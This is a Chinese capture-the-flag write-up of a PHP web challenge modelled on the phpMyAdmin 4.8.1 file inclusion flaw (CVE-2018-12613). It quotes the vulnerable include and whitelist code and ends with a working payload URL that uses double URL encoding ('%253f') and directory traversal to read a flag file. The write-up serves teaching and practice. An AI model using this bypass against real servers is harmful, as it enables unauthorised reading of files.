为啥想写这道题的wp呢,因为这道题就是照着phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)复现出来的
题目
查看源码很容易找到source.php,直接访问
分析
题目的意思也很好理解主要是要这三个条件全部满足,就会进行文件包含
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
}
发现了checkFile()这个函数,那我们从这个函数来进行分析
首先进来发现了白名单
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
还有就是该函数的末尾,如果输入的参数值包含有白名单里的值,就会返回true
if (in_array($_page, $whitelist)) {
return true;
}
那我们先来看下hint.php(因为这个文件可能是隐藏文件)
http://220.249.52.133:54093/source.php?file=hint.php
确实是给了提示,接下来我们就要考虑怎样绕过,最后读到ffffllllaaaagggg中的内容
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
这个都很好理解,其实大概的意思就是先在$page最后追加个?,再返回最后一个?的地址,然后再用mb_substr截断,大概截断的就是传入file参数的内容
我们可以考虑用双重编码绕过,因为后端会自动解码一次,然后遇到urldecode()函数会再次进行解码,来进行绕过白名单
payload:
http://220.249.52.133:54093/source.php?file=hint.php%253f../../../../../../ffffllllaaaagggg
ps:这里我之前有个疑惑,就是最后再进行包含的时候这个?会有没有影响,其实我大概实践了一下,在进行目录穿越的过程中,文件名+其他字符../../../ 这是没有影响的
确实是可以返回上一级目录